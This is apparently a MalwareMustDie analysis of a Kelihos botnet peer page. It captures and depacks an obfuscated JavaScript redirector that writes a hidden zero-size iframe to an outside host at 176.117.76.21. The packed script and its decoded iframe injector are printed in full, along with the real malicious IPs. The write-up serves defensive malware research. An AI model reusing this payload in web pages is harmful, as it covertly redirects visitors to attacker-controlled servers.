Kelihos peer redirecting JS scheme

################################################
#
# Accessing specific htm redirector in kelihos peer
# This demonstrated only one Kelihos peer redir traffic
# MalwareMustDie!
#
################################################

---connection---
2015-10-17 00:35:56 http://151.0.21.237/index5.html
Connecting to 151.0.21.237:80... connected.

---request begin---
GET /index5.html HTTP/1.1
User-Agent: booboo
Accept: */*
Accept-Encoding: identity
Host: 151.0.21.237
Connection: Keep-Alive
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200
Server: Apache
Content-Length: 587
Content-Type:
Last-Modified: ?? 16 Ⅷ?2015 15:35:55 GMT
Accept-Ranges: bytes
Server:nginx/1.2.6
Date:Fri, 16 Oct 2015 15:35:57 GMT
Last-Modified:Fri, 16 Oct 2015 15:35:20 GMT
ETag:"56211938-24b"
Accept-Ranges:bytes
---response end---

Saving to: '/test'
/test    100%[===============>]     587  1.30KB/s   in 0.4s

Last-modified header invalid -- time-stamp ignored.
2015-10-17 00:35:58 (1.30 KB/s) - '/test' saved [587/587]


################################################
#
# An online packer packed Javascript...
#
################################################

// curl

$ curl http://151.0.21.237/index5.html
<script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|176||src|height|117|width|board||21|php|76|tag1|ram'.split('|'),0,{}))</script>

// beautified


 eval(function(p,a,c,k,e,d)
 {
   e=function(c)
   {
     return c.toString(36)
   };
   if(!''.replace(/^/,String))
   {
     while(c--)
     {
       d[c.toString(a)]=k[c]||c.toString(a)
     }
     k=[function(e)
     {
       return d[e]
     }
     ];
     e=function()
     {
       return'\\w+'
     };
     c=1
   };
   while(c--)
   {
     if(k[c])
     {
       p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
     }
   }
   return p
 }
 ('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|176||src|height|117|width|board||21|php|76|tag1|ram'.split('|'),0,
 {
 }
 ))


################################################
#
# depacked the script....
#
################################################

 var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://176.117.76.21/tag1.php\">";
 var k0="<if";
 var k01="ram";
 var k02="e";
 var k2="</if";
 var k22="e>";
 document.write(k0);
 setTimeout(document.write(k01+k02+k+k2),1000);
 setTimeout(document.write(k02+k22),1000);

################################################
#
# redirector result....
#
################################################

<iframe width="0" height="0" board="0" src="http://176.117.76.21/tag1.php"></iframe>


################################################
#
# Where does it go?
#
################################################

HTTP/1.1 200
Server: Apache
Content-Length: 54
Content-Type:
Last-Modified: ?? 16 Ⅷ?2015 15:54:40 GMT
Accept-Ranges: bytes
Server:nginx/1.2.6
Date:Fri, 16 Oct 2015 15:54:44 GMT
X-Powered-By:PHP/5.4.11
---response end---

Saving to: 'tag1.php'
tag1.php      100%[===============>]      54   122 B/s   in 0.4s
2015-10-17 00:54:45 (122 B/s) - 'tag1.php' saved [54/54]

$ date
Sat Oct 17 00:56:53 JST 2015
$ cat tag1.php
<!DOCTYPE HTML><html><head></head><body>xxxxxxxxxxxxxxx</body></html>

#MalwareMustDie! Analyzed by @unixfreaxjp

[EOF]